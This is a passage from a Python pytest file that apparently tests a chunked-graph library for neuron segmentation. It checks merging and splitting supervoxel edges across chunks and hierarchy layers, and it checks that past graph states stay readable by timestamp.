# Preparation: Build Chunk Z
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 127, 127, 127, 0)],
edges=[],
timestamp=fake_timestamp)
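# Build the abstraction hierarchy one octree level at a time. The coordinates
# are given in the child layer's chunk grid and halve with every level
# (0x7F -> 0x3F -> ... -> 0x01), so the two corner supervoxels only meet in a
# common parent chunk at the top layer (9).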
cgraph.add_layer(3, np.array([[0x00, 0x00, 0x00]]), time_stamp=fake_timestamp)
cgraph.add_layer(3, np.array([[0x7F, 0x7F, 0x7F]]), time_stamp=fake_timestamp)
cgraph.add_layer(4, np.array([[0x00, 0x00, 0x00]]), time_stamp=fake_timestamp)
cgraph.add_layer(4, np.array([[0x3F, 0x3F, 0x3F]]), time_stamp=fake_timestamp)
cgraph.add_layer(5, np.array([[0x00, 0x00, 0x00]]), time_stamp=fake_timestamp)
cgraph.add_layer(5, np.array([[0x1F, 0x1F, 0x1F]]), time_stamp=fake_timestamp)
cgraph.add_layer(6, np.array([[0x00, 0x00, 0x00]]), time_stamp=fake_timestamp)
cgraph.add_layer(6, np.array([[0x0F, 0x0F, 0x0F]]), time_stamp=fake_timestamp)
cgraph.add_layer(7, np.array([[0x00, 0x00, 0x00]]), time_stamp=fake_timestamp)
cgraph.add_layer(7, np.array([[0x07, 0x07, 0x07]]), time_stamp=fake_timestamp)
cgraph.add_layer(8, np.array([[0x00, 0x00, 0x00]]), time_stamp=fake_timestamp)
cgraph.add_layer(8, np.array([[0x03, 0x03, 0x03]]), time_stamp=fake_timestamp)
cgraph.add_layer(9, np.array([[0x00, 0x00, 0x00], [0x01, 0x01, 0x01]]), time_stamp=fake_timestamp)
# Merge
new_root_ids = cgraph.add_edges("Jane Doe", [to_label(cgraph, 1, 127, 127, 127, 0), to_label(cgraph, 1, 0, 0, 0, 0)], affinities=0.3)
assert len(new_root_ids) == 1
new_root_id = new_root_ids[0]
# Check
assert cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0)) == new_root_id
assert cgraph.get_root(to_label(cgraph, 1, 127, 127, 127, 0)) == new_root_id
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 0))
assert partners[0] == to_label(cgraph, 1, 127, 127, 127, 0) and affinities[0] == np.float32(0.3)
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 127, 127, 127, 0))
assert partners[0] == to_label(cgraph, 1, 0, 0, 0, 0) and affinities[0] == np.float32(0.3)
leaves = np.unique(cgraph.get_subgraph_nodes(new_root_id))
assert len(leaves) == 2
assert to_label(cgraph, 1, 0, 0, 0, 0) in leaves
assert to_label(cgraph, 1, 127, 127, 127, 0) in leaves
@pytest.mark.timeout(30)
def test_merge_pair_already_connected(self, gen_graph):
"""
Add edge between already connected RG supervoxels 1 and 2 (same chunk).
Expected: No change, i.e. same parent (to_label(cgraph, 2, 0, 0, 0, 1)), affinity (0.5) and timestamp as before
┌─────┐ ┌─────┐
│ A¹ │ │ A¹ │
│ 1━2 │ => │ 1━2 │
│ │ │ │
└─────┘ └─────┘
"""
cgraph = gen_graph(n_layers=2)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1)],
edges=[(to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1), 0.5)],
timestamp=fake_timestamp)
res_old = cgraph.table.read_rows()
res_old.consume_all()
# Merge
cgraph.add_edges("Jane Doe", [to_label(cgraph, 1, 0, 0, 0, 1), to_label(cgraph, 1, 0, 0, 0, 0)])
res_new = cgraph.table.read_rows()
res_new.consume_all()
# Check
if res_old.rows != res_new.rows:
warn("Rows were modified when merging a pair of already connected supervoxels. "
"While probably not an error, it is an unnecessary operation.")
@pytest.mark.timeout(30)
def test_merge_triple_chain_to_full_circle_same_chunk(self, gen_graph):
"""
Add edge between indirectly connected RG supervoxels 1 and 2 (same chunk)
┌─────┐ ┌─────┐
│ A¹ │ │ A¹ │
│ 1 2 │ => │ 1━2 │
│ ┗3┛ │ │ ┗3┛ │
└─────┘ └─────┘
"""
cgraph = gen_graph(n_layers=2)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1), to_label(cgraph, 1, 0, 0, 0, 2)],
edges=[(to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 2), 0.5),
(to_label(cgraph, 1, 0, 0, 0, 1), to_label(cgraph, 1, 0, 0, 0, 2), 0.5)],
timestamp=fake_timestamp)
# Merge
new_root_ids = cgraph.add_edges("Jane Doe", [to_label(cgraph, 1, 0, 0, 0, 1), to_label(cgraph, 1, 0, 0, 0, 0)], affinities=0.3)
assert len(new_root_ids) == 1
new_root_id = new_root_ids[0]
# Check
assert cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0)) == new_root_id
assert cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 1)) == new_root_id
assert cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 2)) == new_root_id
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 0))
assert len(partners) == 2
assert to_label(cgraph, 1, 0, 0, 0, 1) in partners
assert to_label(cgraph, 1, 0, 0, 0, 2) in partners
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 1))
assert len(partners) == 2
assert to_label(cgraph, 1, 0, 0, 0, 0) in partners
assert to_label(cgraph, 1, 0, 0, 0, 2) in partners
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 2))
assert len(partners) == 2
assert to_label(cgraph, 1, 0, 0, 0, 0) in partners
assert to_label(cgraph, 1, 0, 0, 0, 1) in partners
leaves = np.unique(cgraph.get_subgraph_nodes(new_root_id))
assert len(leaves) == 3
assert to_label(cgraph, 1, 0, 0, 0, 0) in leaves
assert to_label(cgraph, 1, 0, 0, 0, 1) in leaves
assert to_label(cgraph, 1, 0, 0, 0, 2) in leaves
@pytest.mark.timeout(30)
def test_merge_triple_chain_to_full_circle_neighboring_chunks(self, gen_graph):
"""
Add edge between indirectly connected RG supervoxels 1 and 2 (neighboring chunks)
┌─────┬─────┐ ┌─────┬─────┐
│ A¹ │ B¹ │ │ A¹ │ B¹ │
│ 1 │ 2 │ => │ 1━━┿━━2 │
│ ┗3━┿━━┛ │ │ ┗3━┿━━┛ │
└─────┴─────┘ └─────┴─────┘
"""
cgraph = gen_graph(n_layers=3)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1)],
edges=[(to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1), 0.5),
(to_label(cgraph, 1, 0, 0, 0, 1), to_label(cgraph, 1, 1, 0, 0, 0), inf)],
timestamp=fake_timestamp)
# Preparation: Build Chunk B
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 0, 0, 0)],
edges=[(to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1), inf)],
timestamp=fake_timestamp)
cgraph.add_layer(3, np.array([[0, 0, 0], [1, 0, 0]]), time_stamp=fake_timestamp)
# Merge
new_root_ids = cgraph.add_edges("Jane Doe", [to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 0)], affinities=1.0)
assert len(new_root_ids) == 1
new_root_id = new_root_ids[0]
# Check
assert cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0)) == new_root_id
assert cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 1)) == new_root_id
assert cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 0)) == new_root_id
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 0))
assert len(partners) == 2
assert to_label(cgraph, 1, 0, 0, 0, 1) in partners
assert to_label(cgraph, 1, 1, 0, 0, 0) in partners
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 1))
assert len(partners) == 2
assert to_label(cgraph, 1, 0, 0, 0, 0) in partners
assert to_label(cgraph, 1, 1, 0, 0, 0) in partners
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 1, 0, 0, 0))
assert len(partners) == 2
assert to_label(cgraph, 1, 0, 0, 0, 0) in partners
assert to_label(cgraph, 1, 0, 0, 0, 1) in partners
leaves = np.unique(cgraph.get_subgraph_nodes(new_root_id))
assert len(leaves) == 3
assert to_label(cgraph, 1, 0, 0, 0, 0) in leaves
assert to_label(cgraph, 1, 0, 0, 0, 1) in leaves
assert to_label(cgraph, 1, 1, 0, 0, 0) in leaves
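# Consistency check: for every layer, all child levels must report the same
# number of cross-chunk edges; a mismatch means an edge was lost or
# duplicated while propagating up the hierarchy.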
cross_edge_dict_layers = graph_tests.root_cross_edge_test(new_root_id, cg=cgraph) # dict: layer -> cross_edge_dict
n_cross_edges_layer = collections.defaultdict(list)
for child_layer in cross_edge_dict_layers.keys():
for layer in cross_edge_dict_layers[child_layer].keys():
n_cross_edges_layer[layer].append(len(cross_edge_dict_layers[child_layer][layer]))
for layer in n_cross_edges_layer.keys():
assert len(np.unique(n_cross_edges_layer[layer])) == 1
@pytest.mark.timeout(30)
def test_merge_triple_chain_to_full_circle_disconnected_chunks(self, gen_graph):
"""
Add edge between indirectly connected RG supervoxels 1 and 2 (disconnected chunks)
┌─────┐ ┌─────┐ ┌─────┐ ┌─────┐
│ A¹ │ ... │ Z¹ │ │ A¹ │ ... │ Z¹ │
│ 1 │ │ 2 │ => │ 1━━┿━━━━━┿━━2 │
│ ┗3━┿━━━━━┿━━┛ │ │ ┗3━┿━━━━━┿━━┛ │
└─────┘ └─────┘ └─────┘ └─────┘
"""
cgraph = gen_graph(n_layers=9)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1)],
edges=[(to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1), 0.5),
(to_label(cgraph, 1, 0, 0, 0, 1), to_label(cgraph, 1, 127, 127, 127, 0), inf)],
timestamp=fake_timestamp)
# Preparation: Build Chunk B
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 127, 127, 127, 0)],
edges=[(to_label(cgraph, 1, 127, 127, 127, 0), to_label(cgraph, 1, 0, 0, 0, 1), inf)],
timestamp=fake_timestamp)
cgraph.add_layer(3, np.array([[0x00, 0x00, 0x00]]), time_stamp=fake_timestamp)
cgraph.add_layer(3, np.array([[0x7F, 0x7F, 0x7F]]), time_stamp=fake_timestamp)
cgraph.add_layer(4, np.array([[0x00, 0x00, 0x00]]), time_stamp=fake_timestamp)
cgraph.add_layer(4, np.array([[0x3F, 0x3F, 0x3F]]), time_stamp=fake_timestamp)
cgraph.add_layer(5, np.array([[0x00, 0x00, 0x00]]), time_stamp=fake_timestamp)
cgraph.add_layer(5, np.array([[0x1F, 0x1F, 0x1F]]), time_stamp=fake_timestamp)
cgraph.add_layer(6, np.array([[0x00, 0x00, 0x00]]), time_stamp=fake_timestamp)
cgraph.add_layer(6, np.array([[0x0F, 0x0F, 0x0F]]), time_stamp=fake_timestamp)
cgraph.add_layer(7, np.array([[0x00, 0x00, 0x00]]), time_stamp=fake_timestamp)
cgraph.add_layer(7, np.array([[0x07, 0x07, 0x07]]), time_stamp=fake_timestamp)
cgraph.add_layer(8, np.array([[0x00, 0x00, 0x00]]), time_stamp=fake_timestamp)
cgraph.add_layer(8, np.array([[0x03, 0x03, 0x03]]), time_stamp=fake_timestamp)
cgraph.add_layer(9, np.array([[0x00, 0x00, 0x00], [0x01, 0x01, 0x01]]), time_stamp=fake_timestamp)
# Merge
new_root_ids = cgraph.add_edges("Jane Doe", [to_label(cgraph, 1, 127, 127, 127, 0), to_label(cgraph, 1, 0, 0, 0, 0)], affinities=1.0)
assert len(new_root_ids) == 1
new_root_id = new_root_ids[0]
# Check
assert cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0)) == new_root_id
assert cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 1)) == new_root_id
assert cgraph.get_root(to_label(cgraph, 1, 127, 127, 127, 0)) == new_root_id
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 0))
assert len(partners) == 2
assert to_label(cgraph, 1, 0, 0, 0, 1) in partners
assert to_label(cgraph, 1, 127, 127, 127, 0) in partners
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 1))
assert len(partners) == 2
assert to_label(cgraph, 1, 0, 0, 0, 0) in partners
assert to_label(cgraph, 1, 127, 127, 127, 0) in partners
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 127, 127, 127, 0))
assert len(partners) == 2
assert to_label(cgraph, 1, 0, 0, 0, 0) in partners
assert to_label(cgraph, 1, 0, 0, 0, 1) in partners
leaves = np.unique(cgraph.get_subgraph_nodes(new_root_id))
assert len(leaves) == 3
assert to_label(cgraph, 1, 0, 0, 0, 0) in leaves
assert to_label(cgraph, 1, 0, 0, 0, 1) in leaves
assert to_label(cgraph, 1, 127, 127, 127, 0) in leaves
cross_edge_dict_layers = graph_tests.root_cross_edge_test(new_root_id, cg=cgraph) # dict: layer -> cross_edge_dict
n_cross_edges_layer = collections.defaultdict(list)
for child_layer in cross_edge_dict_layers.keys():
for layer in cross_edge_dict_layers[child_layer].keys():
n_cross_edges_layer[layer].append(len(cross_edge_dict_layers[child_layer][layer]))
for layer in n_cross_edges_layer.keys():
assert len(np.unique(n_cross_edges_layer[layer])) == 1
@pytest.mark.timeout(30)
def test_merge_same_node(self, gen_graph):
"""
Try to add loop edge between RG supervoxel 1 and itself
┌─────┐
│ A¹ │
│ 1 │ => Reject
│ │
└─────┘
"""
cgraph = gen_graph(n_layers=2)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0)],
edges=[],
timestamp=fake_timestamp)
res_old = cgraph.table.read_rows()
res_old.consume_all()
# Merge
assert cgraph.add_edges("Jane Doe", [to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 0)]) is None
res_new = cgraph.table.read_rows()
res_new.consume_all()
assert res_new.rows == res_old.rows
@pytest.mark.timeout(30)
def test_merge_pair_abstract_nodes(self, gen_graph):
"""
Try to add edge between RG supervoxel 1 and abstract node "2"
┌─────┐
│ B² │
│ "2" │
│ │
└─────┘
┌─────┐ => Reject
│ A¹ │
│ 1 │
│ │
└─────┘
"""
cgraph = gen_graph(n_layers=3)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0)],
edges=[],
timestamp=fake_timestamp)
# Preparation: Build Chunk B
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 0, 0, 0)],
edges=[],
timestamp=fake_timestamp)
cgraph.add_layer(3, np.array([[0, 0, 0], [1, 0, 0]]), time_stamp=fake_timestamp)
res_old = cgraph.table.read_rows()
res_old.consume_all()
# Merge
assert cgraph.add_edges("Jane Doe", [to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 2, 1, 0, 0, 1)]) is None
res_new = cgraph.table.read_rows()
res_new.consume_all()
assert res_new.rows == res_old.rows
@pytest.mark.timeout(30)
def test_diagonal_connections(self, gen_graph):
"""
Create graph with inf edges 1━3 (neighboring chunks), 1━4 and 4━5,
then merge RG supervoxels 1 and 2 (same chunk)
┌─────┬─────┐
│ A¹ │ B¹ │
│ 2 1━┿━━3 │
│ / │ │
┌─────┬─────┐
│ | │ │
│ 4━━┿━━5 │
│ C¹ │ D¹ │
└─────┴─────┘
"""
cgraph = gen_graph(n_layers=3)
# Chunk A
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0),
to_label(cgraph, 1, 0, 0, 0, 1)],
edges=[(to_label(cgraph, 1, 0, 0, 0, 0),
to_label(cgraph, 1, 1, 0, 0, 0), inf),
(to_label(cgraph, 1, 0, 0, 0, 0),
to_label(cgraph, 1, 0, 1, 0, 0), inf)])
# Chunk B
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 0, 0, 0)],
edges=[(to_label(cgraph, 1, 1, 0, 0, 0),
to_label(cgraph, 1, 0, 0, 0, 0), inf)])
# Chunk C
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 1, 0, 0)],
edges=[(to_label(cgraph, 1, 0, 1, 0, 0),
to_label(cgraph, 1, 1, 1, 0, 0), inf),
(to_label(cgraph, 1, 0, 1, 0, 0),
to_label(cgraph, 1, 0, 0, 0, 0), inf)])
# Chunk D
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 1, 0, 0)],
edges=[(to_label(cgraph, 1, 1, 1, 0, 0),
to_label(cgraph, 1, 0, 1, 0, 0), inf)])
cgraph.add_layer(3,
np.array([[0, 0, 0], [1, 0, 0], [0, 1, 0], [1, 1, 0]]))
rr = cgraph.range_read_chunk(
chunk_id=cgraph.get_chunk_id(layer=3, x=0, y=0, z=0))
root_ids_t0 = list(rr.keys())
assert len(root_ids_t0) == 2
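# Two roots before the merge: the component {1, 3, 4, 5} linked by inf
# edges, and the still isolated supervoxel 2.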
child_ids = []
for root_id in root_ids_t0:
cgraph.logger.debug(("root_id", root_id))
child_ids.extend(cgraph.get_subgraph_nodes(root_id))
new_roots = cgraph.add_edges("Jane Doe",
[to_label(cgraph, 1, 0, 0, 0, 0),
to_label(cgraph, 1, 0, 0, 0, 1)],
affinities=[.5])
root_ids = []
for child_id in child_ids:
root_ids.append(cgraph.get_root(child_id))
assert len(np.unique(root_ids)) == 1
root_id = root_ids[0]
assert root_id == new_roots[0]
cross_edge_dict_layers = graph_tests.root_cross_edge_test(root_id,
cg=cgraph) # dict: layer -> cross_edge_dict
n_cross_edges_layer = collections.defaultdict(list)
for child_layer in cross_edge_dict_layers.keys():
for layer in cross_edge_dict_layers[child_layer].keys():
n_cross_edges_layer[layer].append(
len(cross_edge_dict_layers[child_layer][layer]))
for layer in n_cross_edges_layer.keys():
assert len(np.unique(n_cross_edges_layer[layer])) == 1
@pytest.mark.timeout(30)
def test_cross_edges(self, gen_graph):
"""
Add edge between existing RG supervoxels 1 and 4 (same chunk) and verify the cross-chunk edges
┌─...─┬────────┬─────┐ ┌─...─┬────────┬─────┐
| │ A¹ │ B¹ │ | │ A¹ │ B¹ │
| │ 4 1━━┿━━5 │ => | │ 4━━1━━┿━━5 │
| │ / │ | │ | │ / │ │
| │ 3 2━━┿━━6 │ | │ 3 2━━┿━━6 │
└─...─┴────────┴─────┘ └─...─┴────────┴─────┘
"""
cgraph = gen_graph(n_layers=6)
chunk_offset = 6
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, chunk_offset, 0, 0, 0), to_label(cgraph, 1, chunk_offset, 0, 0, 1),
to_label(cgraph, 1, chunk_offset, 0, 0, 2), to_label(cgraph, 1, chunk_offset, 0, 0, 3)],
edges=[(to_label(cgraph, 1, chunk_offset, 0, 0, 0), to_label(cgraph, 1, chunk_offset+1, 0, 0, 0), inf),
(to_label(cgraph, 1, chunk_offset, 0, 0, 1), to_label(cgraph, 1, chunk_offset+1, 0, 0, 1), inf),
(to_label(cgraph, 1, chunk_offset, 0, 0, 0), to_label(cgraph, 1, chunk_offset, 0, 0, 2), .5)],
timestamp=fake_timestamp)
# Preparation: Build Chunk B
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, chunk_offset+1, 0, 0, 0), to_label(cgraph, 1, chunk_offset+1, 0, 0, 1)],
edges=[(to_label(cgraph, 1, chunk_offset+1, 0, 0, 0), to_label(cgraph, 1, chunk_offset, 0, 0, 0), inf),
(to_label(cgraph, 1, chunk_offset+1, 0, 0, 1), to_label(cgraph, 1, chunk_offset, 0, 0, 1), inf),
(to_label(cgraph, 1, chunk_offset+1, 0, 0, 0), to_label(cgraph, 1, chunk_offset+2, 0, 0, 0), inf),
(to_label(cgraph, 1, chunk_offset+1, 0, 0, 1), to_label(cgraph, 1, chunk_offset+2, 0, 0, 1), inf)],
timestamp=fake_timestamp)
# Preparation: Build Chunk C
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, chunk_offset+2, 0, 0, 0), to_label(cgraph, 1, chunk_offset+2, 0, 0, 1)],
edges=[(to_label(cgraph, 1, chunk_offset+2, 0, 0, 0), to_label(cgraph, 1, chunk_offset+1, 0, 0, 0), inf),
(to_label(cgraph, 1, chunk_offset+2, 0, 0, 1), to_label(cgraph, 1, chunk_offset+1, 0, 0, 1), inf),
(to_label(cgraph, 1, chunk_offset+2, 0, 0, 0), to_label(cgraph, 1, chunk_offset+3, 0, 0, 0), inf),
(to_label(cgraph, 1, chunk_offset+2, 0, 0, 0), to_label(cgraph, 1, chunk_offset+2, 0, 0, 1), .5)],
timestamp=fake_timestamp)
# Preparation: Build Chunk D
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, chunk_offset+3, 0, 0, 0)],
edges=[(to_label(cgraph, 1, chunk_offset+3, 0, 0, 0), to_label(cgraph, 1, chunk_offset+2, 0, 0, 0), inf),
(to_label(cgraph, 1, chunk_offset+3, 0, 0, 0), to_label(cgraph, 1, chunk_offset+4, 0, 0, 0), inf)],
timestamp=fake_timestamp)
# Preparation: Build Chunk E
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, chunk_offset+4, 0, 0, 0)],
edges=[(to_label(cgraph, 1, chunk_offset+4, 0, 0, 0), to_label(cgraph, 1, chunk_offset+3, 0, 0, 0), inf),
(to_label(cgraph, 1, chunk_offset+4, 0, 0, 0), to_label(cgraph, 1, chunk_offset+5, 0, 0, 0), inf)],
timestamp=fake_timestamp)
# Preparation: Build Chunk F
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, chunk_offset+5, 0, 0, 0)],
edges=[(to_label(cgraph, 1, chunk_offset+5, 0, 0, 0), to_label(cgraph, 1, chunk_offset+4, 0, 0, 0), inf)],
timestamp=fake_timestamp)
for i_layer in range(3, 7):
for i_chunk in range(0, 2 ** (7 - i_layer), 2):
cgraph.add_layer(i_layer, np.array([[i_chunk, 0, 0], [i_chunk+1, 0, 0]]), time_stamp=fake_timestamp)
new_roots = cgraph.add_edges("Jane Doe",
[to_label(cgraph, 1, chunk_offset, 0, 0, 0),
to_label(cgraph, 1, chunk_offset, 0, 0, 3)],
affinities=.9)
assert len(new_roots) == 1
root_id = new_roots[0]
cross_edge_dict_layers = graph_tests.root_cross_edge_test(root_id, cg=cgraph) # dict: layer -> cross_edge_dict
n_cross_edges_layer = collections.defaultdict(list)
for child_layer in cross_edge_dict_layers.keys():
for layer in cross_edge_dict_layers[child_layer].keys():
n_cross_edges_layer[layer].append(
len(cross_edge_dict_layers[child_layer][layer]))
for layer in n_cross_edges_layer.keys():
cgraph.logger.debug("LAYER %d" % layer)
assert len(np.unique(n_cross_edges_layer[layer])) == 1
class TestGraphSplit:
@pytest.mark.timeout(30)
def test_split_pair_same_chunk(self, gen_graph):
"""
Remove edge between existing RG supervoxels 1 and 2 (same chunk)
Expected: Different (new) parents for RG 1 and 2 on Layer two
┌─────┐ ┌─────┐
│ A¹ │ │ A¹ │
│ 1━2 │ => │ 1 2 │
│ │ │ │
└─────┘ └─────┘
"""
cgraph = gen_graph(n_layers=2)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1)],
edges=[(to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1), 0.5)],
timestamp=fake_timestamp)
# Split
new_root_ids = cgraph.remove_edges("Jane Doe", to_label(cgraph, 1, 0, 0, 0, 1), to_label(cgraph, 1, 0, 0, 0, 0), mincut=False)
# Check New State
assert len(new_root_ids) == 2
assert cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0)) != cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 1))
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 0))
assert len(partners) == 0
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 1))
assert len(partners) == 0
leaves = np.unique(cgraph.get_subgraph_nodes(cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0))))
assert len(leaves) == 1 and to_label(cgraph, 1, 0, 0, 0, 0) in leaves
leaves = np.unique(cgraph.get_subgraph_nodes(cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 1))))
assert len(leaves) == 1 and to_label(cgraph, 1, 0, 0, 0, 1) in leaves
# Check Old State still accessible
assert cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0), time_stamp=fake_timestamp) == \
cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 1), time_stamp=fake_timestamp)
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 0), time_stamp=fake_timestamp)
assert len(partners) == 1 and partners[0] == to_label(cgraph, 1, 0, 0, 0, 1)
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 1), time_stamp=fake_timestamp)
assert len(partners) == 1 and partners[0] == to_label(cgraph, 1, 0, 0, 0, 0)
leaves = np.unique(cgraph.get_subgraph_nodes(cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0), time_stamp=fake_timestamp)))
assert len(leaves) == 2
assert to_label(cgraph, 1, 0, 0, 0, 0) in leaves
assert to_label(cgraph, 1, 0, 0, 0, 1) in leaves
# assert len(cgraph.get_latest_roots()) == 2
# assert len(cgraph.get_latest_roots(fake_timestamp)) == 1
@pytest.mark.timeout(30)
def test_split_nonexisting_edge(self, gen_graph):
"""
Try to remove a non-existing edge between RG supervoxels 1 and 3 (same chunk)
Expected: No split, the connected component stays intact
┌─────┐ ┌─────┐
│ A¹ │ │ A¹ │
│ 1━2 │ => │ 1━2 │
│ | │ │ | │
│ 3 │ │ 3 │
└─────┘ └─────┘
"""
cgraph = gen_graph(n_layers=2)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1), to_label(cgraph, 1, 0, 0, 0, 2)],
edges=[(to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1), 0.5),
(to_label(cgraph, 1, 0, 0, 0, 2), to_label(cgraph, 1, 0, 0, 0, 1), 0.5)],
timestamp=fake_timestamp)
# Split
new_root_ids = cgraph.remove_edges("Jane Doe", to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 2), mincut=False)
assert len(new_root_ids) == 1
assert len(cgraph.get_atomic_node_partners(to_label(cgraph, 1, 0, 0, 0, 0))) == 1
@pytest.mark.timeout(30)
def test_split_pair_neighboring_chunks(self, gen_graph):
"""
Remove edge between existing RG supervoxels 1 and 2 (neighboring chunks)
┌─────┬─────┐ ┌─────┬─────┐
│ A¹ │ B¹ │ │ A¹ │ B¹ │
│ 1━━┿━━2 │ => │ 1 │ 2 │
│ │ │ │ │ │
└─────┴─────┘ └─────┴─────┘
"""
cgraph = gen_graph(n_layers=3)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0)],
edges=[(to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 1, 0, 0, 0), 1.0)],
timestamp=fake_timestamp)
# Preparation: Build Chunk B
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 0, 0, 0)],
edges=[(to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 0), 1.0)],
timestamp=fake_timestamp)
cgraph.add_layer(3, np.array([[0, 0, 0], [1, 0, 0]]), time_stamp=fake_timestamp)
# Split
new_root_ids = cgraph.remove_edges("Jane Doe", to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 0), mincut=False)
# Check New State
assert len(new_root_ids) == 2
assert cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0)) != cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 0))
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 0))
assert len(partners) == 0
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 1, 0, 0, 0))
assert len(partners) == 0
leaves = np.unique(cgraph.get_subgraph_nodes(cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0))))
assert len(leaves) == 1 and to_label(cgraph, 1, 0, 0, 0, 0) in leaves
leaves = np.unique(cgraph.get_subgraph_nodes(cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 0))))
assert len(leaves) == 1 and to_label(cgraph, 1, 1, 0, 0, 0) in leaves
# Check Old State still accessible
